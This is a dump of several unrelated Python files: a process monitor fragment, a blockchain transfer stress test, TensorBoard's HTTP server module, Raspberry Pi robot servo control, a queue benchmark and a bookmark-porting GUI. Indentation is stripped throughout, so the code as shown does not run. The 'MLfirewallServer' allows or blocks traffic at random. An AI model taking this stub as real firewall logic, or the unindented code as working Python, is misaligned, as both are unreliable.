                    # occasionally the per-pid files that hold this information are unavailable to be read, so add zero
logging.exception("Exception reading IO counters for child {k}. Recorded IO usage may be incomplete".format(k=k), exc_info=True)
d['psutil_process_disk_write'] += 0
d['psutil_process_disk_read'] += 0
d['psutil_process_time_user'] += total_children_user_time
d['psutil_process_time_system'] += total_children_system_time
logging.debug("sending message")
radio.send(MessageType.TASK_INFO, task_id, d)
first_msg = False
except Exception:
logging.exception("Exception getting the resource usage. Not sending usage to Hub", exc_info=True)
logging.debug("sleeping")
time.sleep(sleep_dur)
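# Example (hypothetical): launching the monitor for the current process from a
# separate process. The hub URL, run id, and task id below are made-up values;
# in practice this wiring is done by the monitoring machinery, not user code.
#
#   import multiprocessing, os
#   p = multiprocessing.Process(target=monitor,
#                               args=(os.getpid(), 0, "udp://127.0.0.1:55055", "run-000"),
#                               kwargs={"sleep_dur": 5})
#   p.daemon = True
#   p.start()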
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="cyber"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission cyber@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 1,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs path, don't split on colon
if gcs.IsGCSPath(specification):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not os.path.isabs(path) and not gcs.IsGCSPath(path):
# Create absolute path out of relative one.
path = os.path.join(os.path.realpath('.'), path)
files[path] = run_name
return files
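# Illustrative example of how specs map to the returned dict (relative paths
# would additionally be made absolute against the current working directory):
#   ParseEventFilesSpec('train:/tmp/logs/train,/tmp/logs/eval')
#     -> {'/tmp/logs/train': 'train', '/tmp/logs/eval': None}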
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon = True
def BuildServer(multiplexer, host, port):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer)
return ThreadedHTTPServer((host, port), factory)
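# Minimal wiring sketch (not part of this module): `multiplexer` must be an
# EventMultiplexer constructed elsewhere, e.g. by the TensorBoard entry point.
#
#   path_to_run = ParseEventFilesSpec('train:/tmp/logs/train,/tmp/logs/eval')
#   StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval=60)
#   BuildServer(multiplexer, 'localhost', 6006).serve_forever()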
|
moveGoogle.py
|
#!/usr/bin/env python
import os
import os.path
import yaml
import time
import random
import multiprocessing
import RPi.GPIO as GPIO
from talk import say
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
from adafruit_servokit import ServoKit
Motor1 = {'EN': 27, 'input1': 19, 'input2': 16}
Motor2 = {'EN': 22, 'input1': 26, 'input2': 20}
for x in Motor1:
GPIO.setup(Motor1[x], GPIO.OUT)
GPIO.setup(Motor2[x], GPIO.OUT)
EN1 = GPIO.PWM(Motor1['EN'], 100)
EN2 = GPIO.PWM(Motor2['EN'], 100)
EN1.start(0)
EN2.start(0)
hand = ServoKit(channels=16)
ROOT_PATH = os.path.realpath(os.path.join(__file__, '..', '..'))
def readYaml():
with open('{}/src/configuration.yaml'.format(ROOT_PATH),'r+', encoding='utf8') as conf:
servo = yaml.load(conf, Loader=yaml.FullLoader)
return servo
def writeYaml(s=None):
with open('{}/src/configuration.yaml'.format(ROOT_PATH),'w', encoding='utf8') as conf:
        if s is None:
yaml.dump(servo,conf)
else:
yaml.dump(s,conf)
servo = readYaml()
if servo is None:
with open('{}/src/configurationBackUp.yaml'.format(ROOT_PATH),'r+', encoding='utf8') as conf:
servoBackUp = yaml.load(conf, Loader=yaml.FullLoader)
writeYaml(servoBackUp)
servo = readYaml()
    if servo is None:
print('close')
exit()
Initial = servo['Initial_Position']['I2C']
Current = servo['Current_Position']['I2C']
InitialGpio = servo['Initial_Position']['Gpio']
CurrentGpio = servo['Current_Position']['Gpio']
GpioPin = servo['Pin']['Gpio']
for i in range(0,6):
GPIO.setup(GpioPin[i], GPIO.OUT)
Servo = []
for i in range(0,6):
Servo.append(GPIO.PWM(GpioPin[i],50))
Servo[i].start(0)
def changeDegree(pin,newDegree,time1=0.05,update=5):
maxChange = 0
pinSize = len(pin)
for i in range(0,pinSize):
maxChange = max(abs(Current[pin[i]]-newDegree[i]),maxChange)
for deg in range(0,maxChange,update):
for i in range(0,pinSize):
if Current[pin[i]]<newDegree[i]:
Current[pin[i]] += update
elif Current[pin[i]]>newDegree[i]:
Current[pin[i]] -= update
for i in range(0,pinSize):
hand.servo[pin[i]].angle = Current[pin[i]]
servo['Current_Position']['I2C'][pin[i]] = Current[pin[i]]
writeYaml()
time.sleep(time1)
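# Example: changeDegree([3, 4], [50, 120]) sweeps I2C servos 3 and 4 towards 50
# and 120 degrees in 5-degree steps with a 0.05 s pause per step (the defaults),
# persisting each intermediate position back to configuration.yaml via writeYaml().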
def takePosition():
changeDegree([7,8],[180,0])
changeDegree([0,1,2,3,4,5,6,7,8,9,10,11],[0,50,130,0,170,170,0,180,0,60,150,0])
def changeDegreeGpio(pin,degree,update,duration):
pinSize = len(pin)
for i in range(0,pinSize):
p = pin[i]
if CurrentGpio[p]>degree[i]:
update = -update
for deg in range(CurrentGpio[p],degree[i],update):
duty = deg/18
duty+=2
Servo[p].ChangeDutyCycle(duty)
time.sleep(duration)
CurrentGpio[p]=degree[i]
writeYaml()
def Run(a, b, c, d, x):
GPIO.output(Motor1['input1'], GPIO.LOW)
GPIO.output(Motor1['input2'], GPIO.LOW)
GPIO.output(Motor2['input1'], GPIO.LOW)
GPIO.output(Motor2['input2'], GPIO.LOW)
if a==1:
GPIO.output(Motor1['input1'], GPIO.HIGH)
if b==1:
GPIO.output(Motor1['input2'], GPIO.HIGH)
if c==1:
GPIO.output(Motor2['input1'], GPIO.HIGH)
if d==1:
GPIO.output(Motor2['input2'], GPIO.HIGH)
EN2.ChangeDutyCycle(x)
EN1.ChangeDutyCycle(x)
def Stop():
Run(0,0,0,0,0)
def Start_Slow(a, b, c, d):
for i in range(0,100,20):
Run(a,b,c,d,i)
time.sleep(0.5)
def Stop_Slow(a,b,c,d):
for i in range(100,0,-20):
Run(a,b,c,d,i)
time.sleep(0.5)
def yes(times=3):
for i in range(0,times):
changeDegree([0],[30])
time.sleep(0.08)
changeDegree([0],[0])
time.sleep(0.08)
def no(times=3):
for i in range(0,times):
changeDegree([15],[70],5,0.05)
time.sleep(0.2)
changeDegree([15],[110],5,0.05)
time.sleep(0.2)
changeDegree([15],[90],5,0.05)
def move_head(times=3):
for i in range(0,times):
changeDegree([0],[20])
changeDegreeGpio([0],[80],5,0.05)
changeDegree([0],[0])
changeDegreeGpio([0],[100],5,0.05)
changeDegreeGpio([0],[90],10,0.01)
def random0():
r = random.randrange(1,10000000)%3
if(r==1):
changeDegree([0],[20])
changeDegree([0],[0])
elif(r==2):
changeDegreeGpio([0],[120],5,0.05)
changeDegreeGpio([0],[90],5,0.05)
else:
changeDegreeGpio([0],[60],5,0.05)
changeDegreeGpio([0],[90],5,0.05)
def random1():
r = random.randrange(1,3)
if(r==1):
changeDegree([0],[20])
changeDegree([0],[0])
changeDegree([3],[50])
changeDegree([9],[100])
changeDegree([9],[60])
changeDegree([3],[0])
elif(r==2):
changeDegree([0],[20])
changeDegree([0],[0])
changeDegree([4],[120])
changeDegree([10],[140])
changeDegree([10],[180])
changeDegree([4],[170])
else:
changeDegree([3,4],[50,120])
changeDegree([9,10],[100,140])
changeDegree([9,10],[60,180])
changeDegree([3,4],[0,180])
def random2():
changeDegree([3,4],[20,150])
pin = [7,8,9,10]
deg = [[160,0,60,100],[180,20,100,140]]
ok = [0,0,0,0]
select = [1,2,0,3,1,0,3,2,1,0,2,3,1,2,3,0,3,1,2,3,1,2,3,0,3,1]
for i in range(0,15):
r = select[i%len(select)]%4
print (' move ',r)
changeDegree([pin[r]],[deg[ok[r]][r]])
ok[r]^=1
takePosition()
def random3():
changeDegree([3,4],[20,150])
pin = [7,8,9,10]
deg = [[160,0,60,100],[180,20,100,140]]
ok = [0,0,0,0]
for i in range(0,15):
r = random.randrange(1,1000000)%4
print (' move ',r)
changeDegree([pin[r]],[deg[ok[r]][r]])
takePosition()
def randomCall(t):
changeDegree([3,4,5,6,7,8,9,10],[50,110,80,70,100,80,160,20])
pin = [5,6,7,8]
deg = [[80,50,100,70],[110,90,110,90]]
select = [89,93,472,347,2, 34, 134, 1937, 1983, 1739, 107, 894, 48, 28, 2048,589,689,123, 34,27,4,91,102,893,10283,53,1283,9485,1973,873,1973,0,10973]
ok = [0,0,0,0]
ln = len(select)
for i in range(0,t*3):
r = select[i%16]%4
changeDegree([pin[r]],[deg[ok[r]][r]])
ok[r]^=1
takePosition()
def expression(t):
print (' i got value of t is : ',t)
if(t==0):
random0()
elif(t==1):
random1()
elif(t==2):
random2()
elif(t==3):
random3()
else:
randomCall(t)
def speakOnline(t):
expression(t)
def speakOffline(speech):
t = int(len(speech)/15)
print ('Offline t value is : ',t)
p1 = multiprocessing.Process(target=expression,args=[t])
p1.start()
say(speech)
|
MLfirewallServer.py
|
# Based on sample in Python documentation at:
# https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
import socket
import threading
import socketserver
DEBUGMODE = True
# SERVER PARAMETERS
SERVER_IP = "0.0.0.0"
SERVER_PORT = 5678
NUM_CONNECTIONS = 10
def printDebugMsg(msg):
if DEBUGMODE:
print(msg)
# ThreadingMixIn supports asynchronous behavior
class MLfirewallServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
# Create the class for handling each client request
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = str(self.request.recv(2048), 'ascii').rstrip("\r\n")
cur_thread = threading.current_thread()
printDebugMsg("{}: Data is {}".format(cur_thread, data))
# Process data and make decision
import random
if random.randint(0, 1):
printDebugMsg("{}: ALLOW packets".format(cur_thread))
self.request.send(bytes("ALLOW", 'ascii'))
else:
printDebugMsg("{}: BLOCK packets".format(cur_thread))
self.request.send(bytes("BLOCK", 'ascii'))
if __name__ == "__main__":
server = MLfirewallServer((SERVER_IP, SERVER_PORT), ThreadedTCPRequestHandler)
# Start a thread for the server. When client connects, a new thread will open for each client.
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
printDebugMsg("Server running in thread: {}".format(server_thread.name))
while True:
pass
# Shut down server when finished. Never actually reaches here since infinite loop above.
server.shutdown()
printDebugMsg("Shutting down server.")
|
consumer.py
|
# Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
import random
import sys
import time
from gevent import monkey as curious_george
curious_george.patch_all(thread=False, select=False)
import gevent
import marktime
from zaqarclient.transport import errors
from zaqar.bench import config
from zaqar.bench import helpers
CONF = config.conf
def claim_delete(queues, stats, test_duration, ttl, grace, limit):
"""Consumer Worker
The Consumer Worker continuously claims and deletes messages
for the specified duration. The time taken for each claim and
delete is recorded for calculating throughput and latency.
"""
end = time.time() + test_duration
claim_total_elapsed = 0
delete_total_elapsed = 0
total_failed_requests = 0
claim_total_requests = 0
delete_total_requests = 0
while time.time() < end:
# NOTE(kgriffs): Distribute requests across all queues evenly.
queue = random.choice(queues)
try:
marktime.start('claim_message')
claim = queue.claim(ttl=ttl, grace=grace, limit=limit)
claim_total_elapsed += marktime.stop('claim_message').seconds
claim_total_requests += 1
except errors.TransportError as ex:
sys.stderr.write("Could not claim messages : {0}\n".format(ex))
total_failed_requests += 1
else:
for msg in claim:
try:
marktime.start('delete_message')
msg.delete()
elapsed = marktime.stop('delete_message').seconds
delete_total_elapsed += elapsed
delete_total_requests += 1
except errors.TransportError as ex:
msg = "Could not delete messages: {0}\n".format(ex)
sys.stderr.write(msg)
total_failed_requests += 1
total_requests = (claim_total_requests +
delete_total_requests +
total_failed_requests)
stats.put({
'total_requests': total_requests,
'claim_total_requests': claim_total_requests,
'delete_total_requests': delete_total_requests,
'claim_total_elapsed': claim_total_elapsed,
'delete_total_elapsed': delete_total_elapsed,
})
def load_generator(stats, num_workers, num_queues,
test_duration, url, ttl, grace, limit):
cli = helpers.get_new_client()
queues = []
for queue_name in helpers.queue_names:
queues.append(cli.queue(queue_name))
gevent.joinall([
gevent.spawn(claim_delete,
queues, stats, test_duration, ttl, grace, limit)
for _ in range(num_workers)
])
def crunch(stats):
total_requests = 0
claim_total_elapsed = 0.0
delete_total_elapsed = 0.0
claim_total_requests = 0
delete_total_requests = 0
while not stats.empty():
entry = stats.get_nowait()
total_requests += entry['total_requests']
claim_total_elapsed += entry['claim_total_elapsed']
delete_total_elapsed += entry['delete_total_elapsed']
claim_total_requests += entry['claim_total_requests']
delete_total_requests += entry['delete_total_requests']
return (total_requests, claim_total_elapsed, delete_total_elapsed,
claim_total_requests, delete_total_requests)
def run(upstream_queue):
num_procs = CONF.consumer_processes
num_workers = CONF.consumer_workers
num_queues = CONF.num_queues
# Stats that will be reported
duration = 0
total_requests = 0
successful_requests = 0
claim_total_requests = 0
delete_total_requests = 0
throughput = 0
claim_latency = 0
delete_latency = 0
# Performance test
if num_procs and num_workers:
stats = mp.Queue()
# TODO(TheSriram) : Make ttl and grace configurable
args = (stats, num_workers, num_queues, CONF.time, CONF.server_url,
300, 200, CONF.messages_per_claim)
procs = [mp.Process(target=load_generator, args=args)
for _ in range(num_procs)]
if CONF.debug:
print('\nStarting consumers (cp={0}, cw={1})...'.format(
num_procs, num_workers))
start = time.time()
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
(total_requests, claim_total_elapsed, delete_total_elapsed,
claim_total_requests, delete_total_requests) = crunch(stats)
successful_requests = claim_total_requests + delete_total_requests
duration = time.time() - start
# NOTE(kgriffs): Duration should never be zero
throughput = successful_requests / duration
if claim_total_requests:
claim_latency = (1000 * claim_total_elapsed /
claim_total_requests)
if delete_total_requests:
delete_latency = (1000 * delete_total_elapsed /
delete_total_requests)
upstream_queue.put({
'consumer': {
'duration_sec': duration,
'total_reqs': total_requests,
'claim_total_requests': claim_total_requests,
'successful_reqs': successful_requests,
'messages_processed': delete_total_requests,
'reqs_per_sec': throughput,
'ms_per_claim': claim_latency,
'ms_per_delete': delete_latency,
}
})
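# Example (hypothetical): the bench master normally invokes run() with a queue
# used to collect this role's report.
#
#   upstream = mp.Queue()
#   run(upstream)
#   report = upstream.get()
#   print(report['consumer']['reqs_per_sec'])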
|
nicofox2bookmarks_gui.py
|
# -*- coding: UTF-8 -*-
import configparser
import gettext
import itertools
import pathlib
import subprocess
import threading
import tkinter as tk
import tkinter.messagebox
import tkinter.ttk
import firefox_helper
import nicofox2bookmarks
__title__ = 'NicoFox to Firefox Bookmarks'
__version__ = '0.1.0'
# Private constants.
_CONFIG_FILENAME = 'configs.ini'
_LOCALE_DIRNAME = 'locale'
_TRANSLATION_DOMAIN = 'nicofox2bookmarks_gui'
_PADX = 4 # Default X padding between widgets.
_PADY = 2 # Default Y padding between widgets.
_STARTUP_MIN_WIDTH = 480
def _load_configs(filename=_CONFIG_FILENAME):
configs = configparser.ConfigParser()
configs.read(filename)
return configs
def _setup_i18n(configs):
prefered_languages = configs.get('General', 'PreferredLanguages', fallback='')
if prefered_languages:
prefered_languages = [lang.strip() for lang in prefered_languages.split(',') if lang.strip()]
else:
prefered_languages = ['zh_TW']
locale_dir = pathlib.Path(_LOCALE_DIRNAME).absolute()
translation = gettext.translation(
_TRANSLATION_DOMAIN,
localedir=locale_dir,
languages=prefered_languages,
fallback=True)
translation.install()
def _open_in_explorer(path):
subprocess.Popen([r'explorer.exe', r'/select,', path])
def _make_open_in_explorer(get_path):
def _do_open_in_explorer():
path = get_path().strip().strip('"')
if path:
if pathlib.Path(path).exists():
_open_in_explorer(path)
else:
tk.messagebox.showinfo(__title__, _('Target path does not exist.'))
return _do_open_in_explorer
def _get_widget_geometry(widget):
geometry = widget.geometry()
size, x, y = geometry.split('+')
width, height = size.split('x')
return int(width), int(height), int(x), int(y)
def _set_widget_geometry(widget, width, height, x, y):
new_geometry = '{}x{}+{}+{}'.format(width, height, x, y)
widget.geometry(newGeometry=new_geometry)
def _create_section_title_label(parent, text):
label = tk.ttk.Label(parent, text=text, anchor=tk.CENTER)
label.config(background='black')
label.config(foreground='white')
return label
def _pad_widget_children_grid(widget, padx=_PADX, pady=_PADY):
for child in widget.winfo_children():
child.grid_configure(padx=padx, pady=pady)
def _pad_widget_children_pack(widget, padx=_PADX, pady=_PADY):
for child in widget.winfo_children():
child.pack_configure(padx=padx, pady=pady)
def _porting_task(param, on_exit):
try:
nicofox_path = param['nicofox_path']
bookmark_path = param['bookmark_path']
output_path = param['output_path']
metadata = param['metadata']
bookmarks = nicofox2bookmarks.import_nicofox_db(str(nicofox_path))
if bookmarks:
nicofox2bookmarks.export_bookmarks_to_json(str(output_path), str(bookmark_path), bookmarks, metadata)
tk.messagebox.showinfo(__title__, _('Successful! {} bookmark(s) are ported.').format(len(bookmarks)))
else:
tk.messagebox.showinfo(__title__, _('No data to port.'))
except Exception as ex:
tk.messagebox.showerror(__title__, _('Exception occurred during porting data:\n{}').format(ex))
finally:
on_exit()
class TaskDialog:
"""Show the task status visually and start the worker thread."""
def __init__(self, parent, task_param):
# Setup GUI.
self._top = tk.Toplevel(parent)
self._top.resizable(width=True, height=False)
self._top.protocol('WM_DELETE_WINDOW', self.on_user_close)
self._label = tk.ttk.Label(self._top, text=_('Porting data, please wait.'), anchor=tk.CENTER)
self._label.pack(fill=tk.BOTH)
self._progress_bar = tk.ttk.Progressbar(self._top, orient=tk.HORIZONTAL, mode='indeterminate')
self._progress_bar.start()
self._progress_bar.pack(fill=tk.BOTH)
_pad_widget_children_pack(self._top)
# Move this window to the center of parent.
parent_width, parent_height, parent_x, parent_y = _get_widget_geometry(parent)
self._top.update_idletasks()
my_width, my_height, my_x, my_y = _get_widget_geometry(self._top)
my_x = int(parent_x + (parent_width - my_width) / 2)
my_y = int(parent_y + (parent_height - my_height) / 2)
_set_widget_geometry(self._top, my_width, my_height, my_x, my_y)
# Start task
self._done = False
self._closed = False
self._closing_lock = threading.Lock()
self._worker = threading.Thread(target=_porting_task, args=(task_param, self.on_task_exit))
self._worker.start()
def close(self):
try:
self._closing_lock.acquire()
if not self._closed:
self._progress_bar.stop()
self._top.destroy()
self._closed = True
finally:
self._closing_lock.release()
def on_task_exit(self):
self.close()
self._done = True
def on_user_close(self):
to_close = tk.messagebox.askyesno(
__title__,
_('Close this window will NOT stop the porting task.\nDo you still want to close it?'))
        if to_close:  # askyesno() returns a bool, not the string tk.YES
self.close()
@property
def done(self):
return self._done
class ProfilesSelector(tk.Frame):
"""Panel for select Firefox profile."""
def __init__(self, *args, **kwargs):
super(ProfilesSelector, self).__init__(*args, **kwargs)
# Setup attributes.
self._profiles_loaded = False
self._profiles_namelist = []
self._profiles = []
# Setup GUI.
_create_section_title_label(self, text=_('Profiles')).pack(fill=tk.BOTH)
self._profiles_combobox = tk.ttk.Combobox(self)
self._profiles_combobox.config(state='readonly')
self._profiles_combobox.pack(fill=tk.BOTH)
_pad_widget_children_pack(self)
def load_profiles(self, force_reload=False):
if force_reload:
self._profiles_namelist.clear()
self._profiles.clear()
self._profiles_loaded = False
if not self._profiles_loaded:
self._profiles = firefox_helper.get_firefox_profiles()
if self._profiles:
self._profiles_namelist = [profile.name for profile in self._profiles]
try:
default_index = next(index for index, profile in enumerate(self._profiles) if profile.is_default)
self._profiles_namelist[default_index] += ' ({})'.format(_('default'))
except StopIteration:
default_index = -1
else:
default_index = -1
self._profiles.insert(0, None)
self._profiles_namelist.insert(0, _('<Manual Settings>'))
self._profiles_combobox['values'] = self._profiles_namelist
self._profiles_combobox.current(1 + default_index)
self._profiles_loaded = True
@property
def selected_profile(self):
selection = self._profiles_combobox.current()
return self._profiles[selection]
class PathField(tk.Frame):
def __init__(self, *args, **kwargs):
super(PathField, self).__init__(*args, **kwargs)
self._label = tk.ttk.Label(self, text='Path:')
self._label.grid(sticky=tk.W)
self._entry = tk.ttk.Entry(self)
self._entry.grid(row=1, columnspan=2, sticky=tk.W+tk.E)
self._open_in_folder_btn = tk.ttk.Button(
self,
text=_('Open in Explorer'),
command=_make_open_in_explorer(lambda: self._entry.get()))
self._open_in_folder_btn.grid(row=0, column=1, sticky=tk.E)
self.columnconfigure(0, weight=3)
self.columnconfigure(1, weight=1)
_pad_widget_children_grid(self)
@property
def label(self):
return self._label.cget('text')
@label.setter
def label(self, text):
self._label.config(text=text)
@property
def path(self):
return self._entry.get().strip().strip('"')
@path.setter
def path(self, text):
self._entry.delete(0, tk.END)
self._entry.insert(0, text)
class PathPanel(tk.Frame):
"""Panel for input the files' path."""
def __init__(self, *args, **kwargs):
super(PathPanel, self).__init__(*args, **kwargs)
        title_label = _create_section_title_label(self, text=_('Paths'))
title_label.pack(fill=tk.BOTH)
self._nicofox_field = PathField(self)
self._nicofox_field.label = _('NicoFox Database:')
self._nicofox_field.pack(fill=tk.BOTH)
self._bookmark_field = PathField(self)
self._bookmark_field.label = _('Bookmarks Backup:')
self._bookmark_field.pack(fill=tk.BOTH)
self._output_field = PathField(self)
self._output_field.label = _('Output Bookmarks:')
self._output_field.pack(fill=tk.BOTH)
_pad_widget_children_pack(self, padx=0)
title_label.pack_configure(padx=_PADX)
@property
def nicofox_path(self):
return self._nicofox_field.path
@nicofox_path.setter
def nicofox_path(self, path):
self._nicofox_field.path = path
@property
def bookmark_path(self):
return self._bookmark_field.path
@bookmark_path.setter
def bookmark_path(self, path):
self._bookmark_field.path = path
@property
def output_path(self):
return self._output_field.path
@output_path.setter
def output_path(self, path):
self._output_field.path = path
class MetaPanel(tk.Frame):
"""Panel for input metadata like container name, common tags, etc."""
def __init__(self, *args, **kwargs):
super(MetaPanel, self).__init__(*args, **kwargs)
row_counter = itertools.count()
_create_section_title_label(self, text=_('Metadata')).grid(
row=next(row_counter), columnspan=2, sticky=tk.W+tk.E)
self._container_entry = self._create_field(_('Container:'), next(row_counter))
self._container_desc_entry = self._create_field(_('Container Description:'), next(row_counter))
self._common_tags_entry = self._create_field(_('Common Tags:'), next(row_counter))
self.columnconfigure(1, weight=1)
_pad_widget_children_grid(self)
def _create_field(self, label, row):
tk.ttk.Label(self, text=label).grid(row=row, column=0, sticky=tk.E)
entry = tk.ttk.Entry(self)
entry.grid(row=row, column=1, sticky=tk.W+tk.E)
return entry
@property
def container(self):
return self._container_entry.get().strip()
@container.setter
def container(self, text):
self._container_entry.delete(0, tk.END)
self._container_entry.insert(0, text)
@property
def container_description(self):
return self._container_desc_entry.get().strip()
@container_description.setter
def container_description(self, text):
self._container_desc_entry.delete(0, tk.END)
self._container_desc_entry.insert(0, text)
@property
def common_tags(self):
tags_text = self._common_tags_entry.get().strip()
return [tag.strip() for tag in tags_text.split(',') if tag.strip()]
@common_tags.setter
def common_tags(self, tags):
tags_text = ', '.join(tag.strip() for tag in tags if tag.strip())
self._common_tags_entry.delete(0, tk.END)
self._common_tags_entry.insert(0, tags_text)
class Processor:
"""Collect data from UI and launch porting tasks."""
def __init__(self):
self._profile_getter = None
self._path_source = None
self._meta_source = None
self._tasks = []
self._on_all_tasks_complete = None
@property
def profile_getter(self):
return self._profile_getter
@profile_getter.setter
def profile_getter(self, getter):
self._profile_getter = getter
@property
def path_source(self):
return self._path_source
@path_source.setter
def path_source(self, source):
self._path_source = source
@property
def meta_source(self):
